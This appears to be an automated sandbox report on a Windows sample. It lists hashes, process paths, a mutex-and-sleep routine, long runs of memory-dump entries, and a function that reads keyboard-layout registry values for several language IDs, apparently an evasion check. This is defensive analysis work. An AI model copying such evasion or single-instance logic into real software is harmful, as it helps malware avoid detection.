File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:21:52
Start date:	14/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff734c50000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	762
Total number of Limit Nodes:	16

Executed Functions

Function 0069652B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0069652A,?,?,?,?,?,00697661), ref: 00696567

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: dd3bb6fc95a4814ffcdfdd6180e31617e8f132373eb42a0f1cdab17fb2439215
Instruction ID: a83658ebdf8169c294670d07bcf29f3ff00635ac4635a84324fd1a612b19f32d
Opcode Fuzzy Hash: dd3bb6fc95a4814ffcdfdd6180e31617e8f132373eb42a0f1cdab17fb2439215
Instruction Fuzzy Hash: 4BE08C30001208AEDE257B18C919D893B6FFB91B45F124828F81886B32CB25EE81CA80

Function 04AC0C8E Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ac0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ae8e312a00e81a47e0f163c16685c2b8243a9d4ed58ef3687c76a13cf26903
Instruction ID: 06f68c1d55b4664be6b3eb09988872d2cdfc14c5daa3fd3c8dba3e4dcda2357a
Opcode Fuzzy Hash: 62ae8e312a00e81a47e0f163c16685c2b8243a9d4ed58ef3687c76a13cf26903
Instruction Fuzzy Hash: 5801DEFB24C210FEB08296C56B10AFA6B7EE5C6730330842BF857C5501F2A97A597472

Function 00665C10 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 006660C9
Wce , xrefs: 00665DB8, 00665E00, 00665DC5, 00665EE0
00000423, xrefs: 006660FA
Wce , xrefs: 006659F4, 00665C24, 00665D67, 00665EE6, 0066603B, 006665F7
0000043f, xrefs: 0066612B
00000419, xrefs: 00666098
Keyboard Layout\Preload, xrefs: 00666054

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$Wce $Wce
API String ID: 0-519967073
Opcode ID: 2b7c92eef75ab492a97721e07663fc4f2913928045fd4df2d195d576497a0f59
Instruction ID: a0c340193441b29f3d22860af465f1c6e30225bd69825bdaa2c1f23a4759f296
Opcode Fuzzy Hash: 2b7c92eef75ab492a97721e07663fc4f2913928045fd4df2d195d576497a0f59
Instruction Fuzzy Hash: 64F1C170900258AFEB24DF54CC85BDEBBBAEF44304F5086ADF509A7281DB759A84CF94

Function 00669BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: d518584114b22a6ff3d1089d1390bb59ad5883cf2657178e516470adf31363b2
Instruction ID: 27085835523e1c0cef69c802ff27d37b905eb381f0c1c581441b882fb3160e86
Opcode Fuzzy Hash: d518584114b22a6ff3d1089d1390bb59ad5883cf2657178e516470adf31363b2
Instruction Fuzzy Hash: A8315B71A04200DBEB08DB78DD89BADBB77EFC1314F308658E414A73D9C77559808761

Function 00669F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: 8e942c38c1f5136790919a3ab4d6ad5104d1d956235ad837d9443de6866a370c
Instruction ID: d6287ef3c27cc76d95c9f268226f7ceda5ab9e1efe660114285fbce817151f70
Opcode Fuzzy Hash: 8e942c38c1f5136790919a3ab4d6ad5104d1d956235ad837d9443de6866a370c
Instruction Fuzzy Hash: 17314A71614100DBEB189BB8DD88BACB777EF85314F308619E418EB3D5D73659808B62

Function 0066A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
